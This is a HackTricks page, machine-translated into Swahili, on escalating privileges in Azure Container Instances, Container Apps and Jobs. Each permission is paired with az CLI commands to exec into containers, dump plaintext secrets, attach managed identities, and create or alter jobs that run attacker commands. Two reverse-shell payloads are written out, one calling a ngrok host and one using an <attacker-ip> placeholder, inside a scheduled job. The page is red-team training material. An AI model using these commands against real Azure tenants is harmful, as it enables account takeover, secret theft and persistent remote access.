Az - Azure Container Instances, Apps & Jobs Privesc

Reading time: 8 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure Container Instances, Apps & Jobs

Kwa maelezo zaidi angalia:

Az - Container Instances, Apps & Jobs

ACI

Microsoft.ContainerInstance/containerGroups/read, Microsoft.ContainerInstance/containerGroups/containers/exec/action

Hizi ruhusa zinamruhusu mtumiaji kutekeleza amri katika kontena linalofanya kazi. Hii inaweza kutumika kuinua mamlaka katika kontena ikiwa ina kitambulisho kinachosimamiwa kilichounganishwa. Bila shaka, pia inawezekana kufikia msimbo wa chanzo na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.

Ili kupata shell ni rahisi kama:

bash
az container exec --name <container-name> --resource-group <res-group>  --exec-command '/bin/sh'

Inawezekana pia kusoma matokeo ya kontena kwa:

bash
az container attach --name <container-name> --resource-group <res-group>

Au pata rekodi za:

bash
az container logs --name <container-name> --resource-group <res-group>

Microsoft.ContainerInstance/containerGroups/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

Hizi ruhusa zinaruhusu kuunganisha utambulisho wa mtumiaji ulioendeshwa kwa kundi la kontena. Hii ni muhimu sana kuongeza mamlaka katika kontena.

Ili kuunganisha utambulisho wa mtumiaji ulioendeshwa kwa kundi la kontena:

bash
az rest \
--method PATCH \
--url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerInstance/containerGroups/<container-name>?api-version=2021-09-01" \
--body '{
"identity": {
"type": "UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>": {}
}
}
}' \
--headers "Content-Type=application/json"

Microsoft.Resources/subscriptions/resourcegroups/read, Microsoft.ContainerInstance/containerGroups/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

Hizi ruhusa zinaruhusu kuunda au kusasisha kundi la kontena lenye utambulisho wa mtumiaji uliopewa usimamizi ulioambatanishwa nalo. Hii ni muhimu sana kuongeza mamlaka katika kontena.

bash
az container create \
--resource-group <res-group> \
--name nginx2 \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--assign-identity "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>" \
--restart-policy OnFailure \
--os-type Linux \
--cpu 1 \
--memory 1.0

Zaidi ya hayo, inawezekana pia kuboresha kundi la kontena lililopo kwa kuongeza kwa mfano --command-line argument yenye shell ya kurudi.

ACA

Microsoft.App/containerApps/read, Microsoft.App/managedEnvironments/read, microsoft.app/containerapps/revisions/replicas, Microsoft.App/containerApps/revisions/read, Microsoft.App/containerApps/getAuthToken/action

Ruhusa hizi zinamruhusu mtumiaji kupata shell katika kontena la programu linalotembea. Hii inaweza kutumika kuinua mamlaka katika kontena ikiwa ina kitambulisho chochote kinachosimamiwa kilichounganishwa. Bila shaka, pia inawezekana kufikia ms source code na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.

bash
az containerapp exec --name <app-name> --resource-group <res-group> --command "sh"
az containerapp debug --name <app-name> --resource-group <res-group>

Microsoft.App/containerApps/listSecrets/action

Ruhusa hii inaruhusu kupata maandishi wazi ya siri zilizowekwa ndani ya programu ya kontena. Kumbuka kwamba siri zinaweza kuwekwa na maandiko wazi au kwa kiungo cha vault ya funguo (katika hali hiyo programu itakuwa na kitambulisho kinachosimamiwa kilichopewa ufikiaji juu ya siri).

bash
az containerapp secret list --name <app-name> --resource-group <res-group>
az containerapp secret show --name <app-name> --resource-group <res-group> --secret-name <scret-name>

Microsoft.App/containerApps/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

Hizi ruhusa zinaruhusu kuunganisha kitambulisho kinachosimamiwa na mtumiaji kwa programu ya kontena. Hii ni muhimu sana kuongeza mamlaka katika kontena. Kutekeleza hatua hii kutoka kwa az cli pia kunahitaji ruhusa Microsoft.App/containerApps/listSecrets/action.

Ili kuunganisha kitambulisho kinachosimamiwa na mtumiaji kwa kundi la kontena:

bash
az containerapp identity assign -n <app-name> -g <res-group> --user-assigned myUserIdentityName

Microsoft.App/containerApps/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action

Hizi ruhusa zinaruhusu kuunda au kusasisha kontena la programu lenye utambulisho wa mtumiaji ulioendeshwa ulioambatanishwa nalo. Hii ni muhimu sana kuongeza mamlaka katika kontena.

bash
# Get environments
az containerapp env list --resource-group Resource_Group_1

# Create app in a an environment
az containerapp create \
--name <app-name> \
--resource-group <res-group> \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--cpu 1 --memory 1.0 \
--user-assigned <user-asigned-identity-name> \
--min-replicas 1 \
--command "<reserse shell>"

tip

Kumbuka kwamba kwa ruhusa hizi mipangilio mingine ya programu inaweza kubadilishwa ambayo inaweza kuruhusu kufanya mashambulizi mengine ya privesc na post exploitation kulingana na mipangilio ya programu zilizopo.

Jobs

Microsoft.App/jobs/read, Microsoft.App/jobs/write

Ingawa kazi si za muda mrefu kama programu za kontena, unaweza kutumia uwezo wa kubadilisha mipangilio ya amri ya kazi unapozindua utekelezaji. Kwa kutengeneza kiolezo maalum cha kazi (kwa mfano, kubadilisha amri ya kawaida na shell ya kurudi), unaweza kupata ufikiaji wa shell ndani ya kontena linaloendesha kazi hiyo.

bash
# Retrieve the current job configuration and save its template:
az containerapp job show --name <job-name> --resource-group <res-group> --output yaml > job-template.yaml

# Edit job-template.yaml to override the command with a reverse shell (or similar payload):
# For example, change the container’s command to:
#  - args:
#      - -c
#      - bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/18224 0>&1
#      command:
#      - /bin/bash
#      image: mcr.microsoft.com/azureml/minimal-ubuntu22.04-py39-cpu-inference:latest

# Update and wait until the job is triggered (or change ths type to scheduled)
az containerapp job update --name deletemejob6 --resource-group Resource_Group_1 --yaml /tmp/changeme.yaml

# Start a new job execution with the modified template:
az containerapp job start --name <job-name> --resource-group <res-group> --yaml job-template.yaml

Microsoft.App/jobs/read, Microsoft.App/jobs/listSecrets/action

Ikiwa una ruhusa hizi unaweza orodhesha siri zote (ruhusa ya kwanza) ndani ya kontena la Job na kisha kusoma thamani za siri zilizowekwa.

bash
az containerapp job secret list --name <job-name> --resource-group <res-group>
az containerapp job secret show --name <job-name> --resource-group <res-group> --secret-name <secret-name>

Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/jobs/write

Ikiwa una ruhusa ya kubadilisha usanidi wa kazi, unaweza kuunganisha utambulisho wa usimamizi uliopewa mtumiaji. Utambulisho huu unaweza kuwa na ruhusa za ziada (kwa mfano, ufikiaji wa rasilimali nyingine au siri) ambazo zinaweza kutumika vibaya ili kupandisha ruhusa ndani ya kontena.

bash
az containerapp job update \
--name <job-name> \
--resource-group <res-group> \
--assign-identity <user-assigned-identity-id>

Microsoft.App/managedEnvironments/read, Microsoft.App/jobs/write, Microsoft.App/managedEnvironments/join/action, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action

Ikiwa unaweza kuunda Kazi mpya ya Mifuko ya Kontena (au kusasisha iliyopo) na kuunganisha kitambulisho kinachosimamiwa, unaweza kubuni kazi hiyo kutekeleza mzigo unaoongeza mamlaka. Kwa mfano, unaweza kuunda kazi mpya ambayo si tu inafanya kazi ya shell ya kurudi bali pia inatumia akidi za kitambulisho kinachosimamiwa kuomba tokeni au kufikia rasilimali nyingine.

bash
az containerapp job create \
--name <new-job-name> \
--resource-group <res-group> \
--environment <environment-name> \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--user-assigned <user-assigned-identity-id> \
--trigger-type Schedule \
--cron-expression "*/1 * * * *" \
--replica-timeout 1800 \
--replica-retry-limit 0 \
--command "bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1'"

tip

Amri hii itatoa kosa ikiwa huna ruhusa ya Microsoft.App/jobs/read ingawa Kazi itaundwa.

microsoft.app/jobs/start/action, microsoft.app/jobs/read

Inaonekana kwamba kwa ruhusa hizi inapaswa kuwa inawezekana kuanzisha kazi. Hii inaweza kutumika kuanzisha kazi yenye shell ya kurudi au amri nyingine yoyote mbaya bila kuhitaji kubadilisha usanidi wa kazi.

Sijafanikiwa kuifanya ifanye kazi lakini kulingana na vigezo vilivyokubaliwa inapaswa kuwa inawezekana.

Microsoft.ContainerInstance/containerGroups/restart/action

Inaruhusu kuanzisha upya kundi maalum la kontena ndani ya Azure Container Instances.

bash
az container restart --resource-group <resource-group> --name <container-instances>

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks